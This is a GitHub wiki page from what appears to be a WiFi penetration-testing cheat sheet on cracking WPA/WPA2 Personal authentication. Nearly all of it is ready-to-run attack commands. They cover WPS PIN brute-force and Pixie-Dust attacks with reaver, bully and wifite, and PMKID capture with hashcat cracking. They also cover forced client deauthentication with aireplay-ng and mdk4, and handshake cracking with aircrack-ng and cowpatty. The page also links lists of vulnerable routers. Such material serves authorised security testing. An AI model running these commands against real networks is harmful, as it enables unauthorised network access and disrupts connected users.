-
Notifications
You must be signed in to change notification settings - Fork 176
07. WPA WPA2 Personal (PSK) Authentication Cracking
Koutto edited this page Nov 1, 2020
·
1 revision
wash -i mon0
wash -i mon0 -c <channel> # Specific channel
wash -i mon0 -c <channel> -C # -C ignores frame checksum errors
PIN Smart bruteforce using known PINs for APs of certain manufacturers + known PIN generation algorithms
airgeddon.sh # => select "Known PINs database based attack"
reaver -i mon0 -b <MAC_AP> -c <channel> -f -N [-L -d 2 -S] -vv
-
-fdisable channel hopping -
-Ndo not send NACK messages when out of order packets are received -
-LIgnore locked state reported by target AP -
-dSet delay between PIN attemps -
-Schoose small Diffie-Hellman values to minimize load on the AP (can speed up cracking)
bully mon0 -b <MAC_AP> -c <channel> -S -F -B -v 3
-
-Ssequential PINs (no randomize) -
-Fforce continue even if warnings -
-Bbruteforce mode
reaver -i mon0 -b <MAC_AP> -c <channel> -K -N -vv
bully mon0 -b <MAC_AP> -d -v 3
Lists of vulnerable routers:
- https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/
- https://docs.google.com/spreadsheets/d/1uJE5YYSP-wHUu5-smIMTmJNu84XAviw-yyTmHyVGmT0/
reaver -i mon0 -b <MAC_AP> -c <channel> -f -N -g 1 -vv -p ''
wifite --wps-only # Only WPS attacks
wifite --wps-only --pixie # Only WPS offline bruteforce attack "Pixie-Dust"
wifite --wps-only --no-pixie # Only WPS online bruteforce attack "PIN attack"
reaver -i wlan0 -b <MAC_AP> -p <PIN_found>
- Capture PMKID:
hcxdumptool -i mon0 -o capture.pcapng --enable_status=1 -c <channel>
./eaphammer --pmkid --interface wlan0 --channel <channel> --bssid <MAC_AP> # Alternative using eaphammer
- Convert captured data to hashcat format:
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z capture.16800 capture.pcapng
- Crack hash with hashcat:
hashcat -m 16800 capture.16800 -a 3 -w 4 '?l?l?l?l?l?lt' # Bruteforce all possible combination of 8-chars lowercase
hashcat -m 16800 capture.16800 -a 0 -w 4 <wordlist> # Dictionary attack
Alternative: Automatic PMKID capture & bruteforce using wifite tool:
wifite --pmkid
- Capture traffic & write captured handshakes to file
airdump-ng -c <channel> --bssid <AP_MAC> -w <capture> mon0
- Deauthenticate client from AP:
aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0
Alternative with mdk4:
mdk4 mon0 d -b <MAC_AP_file> -c <channel> # MAC_AP_file stores MAC address of AP. All clients connected to the AP will be targeted
- Crack:
aircrack-ng -a 2 -b <AP_MAC> -w <wordlist> <capture>
-
Alternative with Hashcat:
- Convert capture (.cap/.pcap) to hashcat format (.hccapx) using hashcat-utils tool cap2hccapx:
cap2hccapx <input.pcap> <output.hccapx>- Crack:
hashcat -m 2500 <capture.hccapx> -a 0 <wordlist> # Dictionary attack -
Alternative with Cowpatty:
cowpatty -f <wordlist> -r <capture> -s <SSID>
- aircrack-ng:
aircrack-ng <capture> # Check for target BSSID/ESSID
-
tshark:
Filter on EAPOL message. There should be 4 messages for a complete hanshake:
tshark -r <capture> -n -Y eapol
- cowpatty:
cowpatty -r <capture> -s <ESSID> -f -
- pyrit:
pyrit -r <capture> analyze
- 01. WiFi Basics
- 02. 802.11 Specifications
- 03. WPS (WiFi Protected Setup)
- 04. WPA Protocol Overview
- 05. WPA/WPA2 Personal (PSK) Authentication
- 06. WPA/WPA2 PSK Traffic Decryption
- 07. WPA/WPA2 Enterprise (MGT)
- 08. Evil Twin Attacks
- 09. 802.11 Network Selection Algorithms
- 01. WiFi Interfaces Management
- 02. WiFi Connection
- 03. WiFi Monitoring (Passive Scanning)
- 04. Hotspot Captive Portal Bypass
- 05. WiFi Denial of Service
- 06. WEP Authentication Cracking
- 07. WPA/WPA2 Personal (PSK) Authentication Cracking
- 08. WPA/WPA2 Enterprise (MGT) Authentication Cracking
- 09. WPA/WPA2 Personal (PSK) Traffic Decryption
- 10. Basic AP (Manual Configuration)
- 11. Open Network (no passphrase) Rogue AP / Evil Twin
- 12. WPA/WPA2 Personal (PSK) Rogue AP / Evil Twin
- 13. WPA/WPA2 Enterprise (MGT) Rogue AP / Evil Twin